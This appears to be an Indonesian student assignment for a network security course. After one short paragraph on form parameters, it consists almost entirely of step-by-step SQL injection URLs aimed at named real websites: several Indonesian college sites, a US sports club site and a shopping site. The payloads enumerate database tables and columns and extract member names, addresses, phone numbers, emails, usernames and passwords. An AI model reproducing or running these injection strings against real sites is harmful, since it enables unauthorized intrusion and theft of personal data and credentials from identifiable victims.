TUGAS
Disusun untuk memenuhi UAS mata kuliah Network Security
pada Semester 5 jurusan Teknik Informatika
Oleh:
Semua yang terletak diantara <FORM> dan </FORM> mempunyai potensial untukdigunakan mengekplorasi
halaman web tersebut. Karena itu dapat menjadi sebuah parameter. Halaman diatas berarti akan mengrimkan
parameter bernama “login”
dengan nilai (value)=”andi”.
http://www.google.co.id/url?sa=t&source=web&ct=res&cd=3&ved=0CBAQFjAC&url=http%3A%2F%2Fp3m.amikom.ac.id%2Fp3m
%2Fdasi%2Fsept04%2F01%2520%2520STMIK%2520AMIKOM%2520Yogyakarta%2520Makalah%2520ANDI%2520_metode
%2520penyerangan_%252010.pdf&rct=j&q=sql+injection+tutorial+filetype
%3Apdf&ei=VoWCS6vmDsGLkAXGg_HGCA&usg=AFQjCNEAjJ9PcHmys_0vytsC4GvTioPKRA
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=1%20UNION%20SELECT%201,2,3,4,5,6
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=1%20UNION%20SELECT%201,@@version,3,4,5,6
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat%28table_name
%29,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat%28column_name
%29,3,4,5,6%20from%20information_schema.columns%20where%20table_name=0x6c6f67696e--
(table login)
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat%28column_name
%29,3,4,5,6%20from%20information_schema.columns%20where%20table_name=0x6d656d626572--
tabel member
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat
%28nama,0x3a,alamat,0x3a,telp,0x3a,email%29,3,4,5,6%20from%20member--
http://www.stmikpontianak.ac.id/
http://www.stmikpontianak.ac.id/news.php?id=-24%20%20UNION%20SELECT%201,2,3,4,5,6,7,8,9%20--
http://www.stmikpontianak.ac.id/news.php?id=-24%20%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9%20--
http://kaestu.akbideub.ac.id/
http://kaestu.akbideub.ac.id/admin/berita.php?id=7%27
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20order%20by%205--
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,2,3,4,5
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,@@version,3,4,5
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,group_concat%28table_name
%29,3,4,5%20from%20information_schema.tables%20where%20table_schema=database%28%29--
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,group_concat%28column_name
%29,3,4,5%20from%20information_schema.columns%20where%20table_name=0x75736572--
(tabel user)
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,group_concat
%28username,0x3a,password,0x3a,email,0x3a,admin,0x3a,status%29,3,4,5%20from%20user--
http://www.worcestercountywildcats.com/
http://www.worcestercountywildcats.com/news.php?id=85%27
http://www.worcestercountywildcats.com/news.php?id=-85%20order%20%20by%2012--
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT
%201,2,3,4,5,6,7,8,@@version,10,11,12
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,group_concat
%28table_name%29,10,11,12%20from%20information_schema.tables%20where%20table_schema=database%28%29--
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,group_concat
%28column_name%29,10,11,12%20from%20information_schema.columns%20where
%20table_name=0x73796d706f6c6c5f61757468--
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,group_concat
%28user,0x3a,pass%29,10,11,12%20from%20sympoll_auth--
http://www.shopaholic.us.com
http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT%201,2,3,4,5,6,7,8,9
http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT
%201,@@version,3,4,5,6,7,8,9
http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT%201,group_concat
%28table_name%29,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database
%28%29--
http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT%201,group_concat
%28column_name%29,3,4,5,6,7,8,9%20from%20information_schema.columns%20where
%20table_name=0x6163636f756e74--